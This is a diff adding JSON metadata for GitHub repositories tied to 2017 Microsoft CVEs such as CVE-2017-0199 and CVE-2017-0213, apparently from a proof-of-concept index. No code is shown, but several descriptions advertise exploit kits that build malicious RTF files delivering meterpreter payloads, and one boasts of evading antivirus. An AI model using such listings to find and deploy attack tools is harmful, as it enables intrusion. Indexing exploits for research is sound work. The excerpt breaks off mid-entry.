"ryhanson\/CVE-2017-0199", + "owner": { + "login": "ryhanson", + "id": 3486433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3486433?v=4", + "html_url": "https:\/\/github.com\/ryhanson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryhanson\/CVE-2017-0199", + "description": null, + "fork": false, + "created_at": "2017-04-13T02:41:36Z", + "updated_at": "2017-04-13T02:41:36Z", + "pushed_at": "2017-04-13T02:41:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 88185964, + "name": "cve-2017-0199", + "full_name": "SyFi\/cve-2017-0199", + "owner": { + "login": "SyFi", + "id": 26314806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26314806?v=4", + "html_url": "https:\/\/github.com\/SyFi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SyFi\/cve-2017-0199", + "description": null, + "fork": false, + "created_at": "2017-04-13T16:40:27Z", + "updated_at": "2024-08-12T19:29:04Z", + "pushed_at": "2017-04-13T16:45:10Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 88486475, + "name": "CVE-2017-0199", + "full_name": "bhdresh\/CVE-2017-0199", + "owner": { + "login": "bhdresh", + "id": 8931885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8931885?v=4", + "html_url": "https:\/\/github.com\/bhdresh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bhdresh\/CVE-2017-0199", + "description": "Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF\/PPSX file and deliver metasploit \/ meterpreter \/ other payload to victim without any complex configuration.", + "fork": false, + "created_at": "2017-04-17T08:10:07Z", + "updated_at": "2024-11-28T09:14:50Z", + "pushed_at": "2017-11-19T11:01:16Z", + "stargazers_count": 724, + "watchers_count": 724, + "has_discussions": false, + "forks_count": 260, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 260, + "watchers": 724, + "score": 0, + "subscribers_count": 46 + }, + { + "id": 88590374, + "name": "CVE-2017-0199-Fix", + "full_name": "NotAwful\/CVE-2017-0199-Fix", + "owner": { + "login": "NotAwful", + "id": 25178947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25178947?v=4", + "html_url": "https:\/\/github.com\/NotAwful", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NotAwful\/CVE-2017-0199-Fix", + "description": "Quick and dirty fix to OLE2 executing code via .hta", + "fork": false, + "created_at": "2017-04-18T06:33:45Z", + "updated_at": "2023-06-16T16:11:28Z", + "pushed_at": "2017-04-24T20:48:36Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-0199", + "guide", + "registry", + "windows" + ], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 88700030, + "name": "CVE-2017-0199-master", + "full_name": "haibara3839\/CVE-2017-0199-master", + "owner": { + "login": "haibara3839", + "id": 17246565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17246565?v=4", + "html_url": "https:\/\/github.com\/haibara3839", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/haibara3839\/CVE-2017-0199-master", + "description": "CVE-2017-0199", + "fork": false, + "created_at": "2017-04-19T04:15:54Z", + "updated_at": "2020-08-13T13:59:18Z", + "pushed_at": "2017-04-19T04:25:47Z", + "stargazers_count": 16, + "watchers_count": 16, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 16, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 89043209, + "name": "CVE-2017-0199", + "full_name": "Exploit-install\/CVE-2017-0199", + "owner": { + "login": "Exploit-install", + "id": 13824191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13824191?v=4", + "html_url": "https:\/\/github.com\/Exploit-install", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Exploit-install\/CVE-2017-0199", + "description": "Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit \/ meterpreter \/ any other payload to victim without any complex configuration.", + "fork": false, + "created_at": "2017-04-22T04:01:38Z", + "updated_at": "2024-08-12T19:29:17Z", + "pushed_at": "2017-04-22T04:01:54Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 7, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 89065031, + "name": "PoC-CVE-2017-0199", + "full_name": "mzakyz666\/PoC-CVE-2017-0199", + "owner": { + "login": "mzakyz666", + "id": 22362343, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22362343?v=4", + "html_url": "https:\/\/github.com\/mzakyz666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mzakyz666\/PoC-CVE-2017-0199", + "description": "Exploit toolkit for vulnerability RCE Microsoft RTF", + "fork": false, + "created_at": "2017-04-22T11:32:39Z", + "updated_at": "2024-11-10T18:46:28Z", + "pushed_at": "2017-04-22T11:35:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 89145802, + "name": "CVE-2017-0199", + "full_name": "n1shant-sinha\/CVE-2017-0199", + "owner": { + "login": "n1shant-sinha", + "id": 8848453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8848453?v=4", + "html_url": "https:\/\/github.com\/n1shant-sinha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n1shant-sinha\/CVE-2017-0199", + "description": "Exploit toolkit CVE-2017-0199 - v2.0 is a handy python script which provides a quick and effective way to exploit Microsoft RTF RCE. It could generate a malicious RTF file and deliver metasploit \/ meterpreter payload to victim without any complex configuration.", + "fork": false, + "created_at": "2017-04-23T13:58:30Z", + "updated_at": "2024-08-12T19:29:19Z", + "pushed_at": "2017-04-23T14:05:24Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 89296859, + "name": "htattack", + "full_name": "kn0wm4d\/htattack", + "owner": { + "login": "kn0wm4d", + "id": 15344287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15344287?v=4", + "html_url": "https:\/\/github.com\/kn0wm4d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kn0wm4d\/htattack", + "description": "An exploit implementation for RCE in RTF & DOCs (CVE-2017-0199)", + "fork": false, + "created_at": "2017-04-24T23:44:31Z", + "updated_at": "2024-08-12T19:29:22Z", + "pushed_at": "2017-04-24T23:45:18Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 89314149, + "name": "Cve-2017-0199", + "full_name": "joke998\/Cve-2017-0199", + "owner": { + "login": "joke998", + "id": 25948923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25948923?v=4", + "html_url": "https:\/\/github.com\/joke998", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joke998\/Cve-2017-0199", + "description": null, + "fork": false, + "created_at": "2017-04-25T03:38:15Z", + "updated_at": "2017-04-25T03:38:15Z", + "pushed_at": "2017-04-25T03:38:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 89314954, + "name": "Cve-2017-0199-", + "full_name": "joke998\/Cve-2017-0199-", + "owner": { + "login": "joke998", + "id": 25948923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25948923?v=4", + "html_url": "https:\/\/github.com\/joke998", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joke998\/Cve-2017-0199-", + "description": "Cve-2017-0199", + "fork": false, + "created_at": "2017-04-25T03:48:53Z", + "updated_at": "2017-04-25T03:48:53Z", + "pushed_at": "2017-04-25T03:48:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 95870771, + "name": "Microsoft-Word-CVE-2017-0199-", + "full_name": "sUbc0ol\/Microsoft-Word-CVE-2017-0199-", + "owner": { + "login": "sUbc0ol", + "id": 24601456, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24601456?v=4", + "html_url": "https:\/\/github.com\/sUbc0ol", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sUbc0ol\/Microsoft-Word-CVE-2017-0199-", + "description": null, + "fork": false, + "created_at": "2017-06-30T09:08:40Z", + "updated_at": "2024-08-12T19:30:58Z", + "pushed_at": "2017-06-30T09:11:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 104072875, + "name": "CVE-2017-0199", + "full_name": "viethdgit\/CVE-2017-0199", + "owner": { + "login": "viethdgit", + "id": 24888568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24888568?v=4", + "html_url": "https:\/\/github.com\/viethdgit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/viethdgit\/CVE-2017-0199", + "description": null, + "fork": false, + "created_at": "2017-09-19T12:38:47Z", + "updated_at": "2017-09-19T12:38:47Z", + "pushed_at": "2017-09-19T12:47:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 109420190, + "name": "RTF-Cleaner", + "full_name": "nicpenning\/RTF-Cleaner", + "owner": { + "login": "nicpenning", + "id": 5582679, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5582679?v=4", + "html_url": "https:\/\/github.com\/nicpenning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nicpenning\/RTF-Cleaner", + "description": "RTF de-obfuscator for CVE-2017-0199 documents to find URLs statically.", + "fork": false, + "created_at": "2017-11-03T16:47:16Z", + "updated_at": "2019-06-29T16:49:45Z", + "pushed_at": "2017-11-03T20:55:20Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 111145351, + "name": "2017-11-17-Maldoc-Using-CVE-2017-0199", + "full_name": "herbiezimmerman\/2017-11-17-Maldoc-Using-CVE-2017-0199", + "owner": { + "login": "herbiezimmerman", + "id": 12056770, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12056770?v=4", + "html_url": "https:\/\/github.com\/herbiezimmerman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/herbiezimmerman\/2017-11-17-Maldoc-Using-CVE-2017-0199", + "description": null, + "fork": false, + "created_at": "2017-11-17T20:00:29Z", + "updated_at": "2024-08-12T19:34:09Z", + "pushed_at": "2017-11-17T20:00:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve2017-0199", + "malware-sample" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 113558617, + "name": "RTF-Cleaner", + "full_name": "jacobsoo\/RTF-Cleaner", + "owner": { + "login": "jacobsoo", + "id": 3516693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3516693?v=4", + "html_url": "https:\/\/github.com\/jacobsoo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jacobsoo\/RTF-Cleaner", + "description": "RTF Cleaner, tries to extract URL from malicious RTF samples using CVE-2017-0199 & CVE-2017-8759", + "fork": false, + "created_at": "2017-12-08T09:45:25Z", + "updated_at": "2022-06-23T11:59:37Z", + "pushed_at": "2017-12-08T09:46:07Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 126305253, + "name": "CVE-2017-0199", + "full_name": "likekabin\/CVE-2017-0199", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2017-0199", + "description": null, + "fork": false, + "created_at": "2018-03-22T08:40:55Z", + "updated_at": "2018-03-22T08:41:14Z", + "pushed_at": "2018-03-22T08:41:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 305189722, + "name": "CVE-2017-0199-PY-KIT", + "full_name": "stealth-ronin\/CVE-2017-0199-PY-KIT", + "owner": { + "login": "stealth-ronin", + "id": 65579305, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65579305?v=4", + "html_url": "https:\/\/github.com\/stealth-ronin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/stealth-ronin\/CVE-2017-0199-PY-KIT", + "description": null, + "fork": false, + "created_at": "2020-10-18T20:24:38Z", + "updated_at": "2020-10-18T20:25:13Z", + "pushed_at": "2020-10-18T20:25:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483583125, + "name": "CVE-2017-0199", + "full_name": "Phantomlancer123\/CVE-2017-0199", + "owner": { + "login": "Phantomlancer123", + "id": 102849364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102849364?v=4", + "html_url": "https:\/\/github.com\/Phantomlancer123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phantomlancer123\/CVE-2017-0199", + "description": null, + "fork": false, + "created_at": "2022-04-20T09:07:52Z", + "updated_at": "2022-04-20T10:30:42Z", + "pushed_at": "2022-04-20T09:09:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 484544802, + "name": "CVE-2017-0199", + "full_name": "BRAINIAC22\/CVE-2017-0199", + "owner": { + "login": "BRAINIAC22", + "id": 89447379, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89447379?v=4", + "html_url": "https:\/\/github.com\/BRAINIAC22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BRAINIAC22\/CVE-2017-0199", + "description": "A python script\/generator, for generating and exploiting Microsoft vulnerability", + "fork": false, + "created_at": "2022-04-22T19:10:16Z", + "updated_at": "2022-04-22T19:14:36Z", + "pushed_at": "2022-04-22T19:14:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524890302, + "name": "CVE-2017-0199-reprofuction", + "full_name": "Sunqiz\/CVE-2017-0199-reprofuction", + "owner": { + "login": "Sunqiz", + "id": 59192636, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2017-0199-reprofuction", + "description": "CVE-2017-0199复现", + "fork": false, + "created_at": "2022-08-15T07:15:55Z", + "updated_at": "2024-08-12T20:26:13Z", + "pushed_at": "2022-08-19T02:09:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 686431739, + "name": "CVE-2017-0199-v5.0", + "full_name": "TheCyberWatchers\/CVE-2017-0199-v5.0", + "owner": { + "login": "TheCyberWatchers", + "id": 110695357, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110695357?v=4", + "html_url": "https:\/\/github.com\/TheCyberWatchers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberWatchers\/CVE-2017-0199-v5.0", + "description": null, + "fork": false, + "created_at": "2023-09-02T19:15:12Z", + "updated_at": "2023-09-02T19:17:12Z", + "pushed_at": "2023-09-02T19:40:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 855196797, + "name": "CVE-2017-0199", + "full_name": "kash-123\/CVE-2017-0199", + "owner": { + "login": "kash-123", + "id": 66589525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66589525?v=4", + "html_url": "https:\/\/github.com\/kash-123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kash-123\/CVE-2017-0199", + "description": "Python3 toolkit update", + "fork": false, + "created_at": "2024-09-10T13:31:55Z", + "updated_at": "2024-09-10T13:40:42Z", + "pushed_at": "2024-09-10T13:37:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0204.json b/2017/CVE-2017-0204.json new file mode 100644 index 0000000000..809bb3be56 --- /dev/null +++ b/2017/CVE-2017-0204.json @@ -0,0 +1,33 @@ +[ + { + "id": 88117558, + "name": "CVE-2017-0204", + "full_name": "ryhanson\/CVE-2017-0204", + "owner": { + "login": "ryhanson", + "id": 3486433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3486433?v=4", + "html_url": "https:\/\/github.com\/ryhanson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ryhanson\/CVE-2017-0204", + "description": null, + "fork": false, + "created_at": "2017-04-13T02:42:24Z", + "updated_at": "2017-04-13T03:12:29Z", + "pushed_at": "2017-04-13T02:42:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0213.json b/2017/CVE-2017-0213.json new file mode 100644 index 0000000000..bd91911de2 --- /dev/null +++ b/2017/CVE-2017-0213.json @@ -0,0 +1,219 @@ +[ + { + "id": 95809289, + "name": "CVE-2017-0213-", + "full_name": "shaheemirza\/CVE-2017-0213-", + "owner": { + "login": "shaheemirza", + "id": 4853436, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4853436?v=4", + "html_url": "https:\/\/github.com\/shaheemirza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shaheemirza\/CVE-2017-0213-", + "description": null, + "fork": false, + "created_at": "2017-06-29T18:49:44Z", + "updated_at": "2024-08-12T19:30:58Z", + "pushed_at": "2017-06-07T17:09:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 95974378, + "name": "CVE-2017-0213", + "full_name": "zcgonvh\/CVE-2017-0213", + "owner": { + "login": "zcgonvh", + "id": 25787677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25787677?v=4", + "html_url": "https:\/\/github.com\/zcgonvh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zcgonvh\/CVE-2017-0213", + "description": "CVE-2017-0213 for command line", + "fork": false, + "created_at": "2017-07-01T16:07:04Z", + "updated_at": "2024-08-12T19:31:01Z", + "pushed_at": "2017-07-01T16:19:12Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 57, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 105444160, + "name": "CVE-2017-0213", + "full_name": "billa3283\/CVE-2017-0213", + "owner": { + "login": "billa3283", + "id": 32428387, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32428387?v=4", + "html_url": "https:\/\/github.com\/billa3283", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/billa3283\/CVE-2017-0213", + "description": null, + "fork": false, + "created_at": "2017-10-01T13:29:59Z", + "updated_at": "2017-10-01T13:29:59Z", + "pushed_at": "2017-10-01T13:30:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 125799686, + "name": "CVE-2017-0213", + "full_name": "likekabin\/CVE-2017-0213", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2017-0213", + "description": null, + "fork": false, + "created_at": "2018-03-19T04:04:05Z", + "updated_at": "2018-03-19T04:04:05Z", + "pushed_at": "2018-03-19T04:04:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 126122153, + "name": "CVE-2017-0213", + "full_name": "jbooz1\/CVE-2017-0213", + "owner": { + "login": "jbooz1", + "id": 19398243, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19398243?v=4", + "html_url": "https:\/\/github.com\/jbooz1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbooz1\/CVE-2017-0213", + "description": "A version of CVE-2017-0213 that I plan to use with an Empire stager", + "fork": false, + "created_at": "2018-03-21T04:13:29Z", + "updated_at": "2024-08-12T19:37:07Z", + "pushed_at": "2018-03-21T04:20:46Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 128978997, + "name": "CVE-2017-0213", + "full_name": "eonrickity\/CVE-2017-0213", + "owner": { + "login": "eonrickity", + "id": 33985450, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33985450?v=4", + "html_url": "https:\/\/github.com\/eonrickity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eonrickity\/CVE-2017-0213", + "description": "Fixed No Virus Manual Automatic Loader exe no zip because zip picks up the anti virus detector.", + "fork": false, + "created_at": "2018-04-10T18:34:17Z", + "updated_at": "2024-08-12T19:37:40Z", + "pushed_at": "2018-04-17T23:14:39Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 453258406, + "name": "CVE-2017-0213", + "full_name": "Anonymous-Family\/CVE-2017-0213", + "owner": { + "login": "Anonymous-Family", + "id": 98486038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98486038?v=4", + "html_url": "https:\/\/github.com\/Anonymous-Family", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anonymous-Family\/CVE-2017-0213", + "description": "Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka \"Windows COM Elevation of Privilege Vulnerability\". This CVE ID is unique from CVE-2017-0214.", + "fork": false, + "created_at": "2022-01-29T00:36:46Z", + "updated_at": "2022-01-31T01:17:25Z", + "pushed_at": "2022-01-29T01:01:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0248.json b/2017/CVE-2017-0248.json new file mode 100644 index 0000000000..a2adaed237 --- /dev/null +++ b/2017/CVE-2017-0248.json @@ -0,0 +1,33 @@ +[ + { + "id": 168158477, + "name": "CVE-2017-0248-Test", + "full_name": "rubenmamo\/CVE-2017-0248-Test", + "owner": { + "login": "rubenmamo", + "id": 7700562, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7700562?v=4", + "html_url": "https:\/\/github.com\/rubenmamo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rubenmamo\/CVE-2017-0248-Test", + "description": "Sample project to test using Microsoft.CodeDom.Providers.DotNetCompilerPlatform 2.0.1 causing CVE-2017-0248", + "fork": false, + "created_at": "2019-01-29T13:23:24Z", + "updated_at": "2023-06-12T10:02:38Z", + "pushed_at": "2019-01-29T13:33:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-0261.json b/2017/CVE-2017-0261.json new file mode 100644 index 0000000000..63a7efc2f3 --- /dev/null +++ b/2017/CVE-2017-0261.json @@ -0,0 +1,64 @@ +[ + { + "id": 178656447, + "name": "eps-CVE-2017-0261", + "full_name": "kcufId\/eps-CVE-2017-0261", + "owner": { + "login": "kcufId", + "id": 10615265, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10615265?v=4", + "html_url": "https:\/\/github.com\/kcufId", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kcufId\/eps-CVE-2017-0261", + "description": "eps漏洞(CVE-2017-0261)漏洞分析", + "fork": false, + "created_at": "2019-03-31T07:29:48Z", + "updated_at": "2021-07-01T06:42:07Z", + "pushed_at": "2019-03-31T07:39:37Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 289408689, + "name": "CVE-2017-0261", + "full_name": "erfze\/CVE-2017-0261", + "owner": { + "login": "erfze", + "id": 38813661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38813661?v=4", + "html_url": 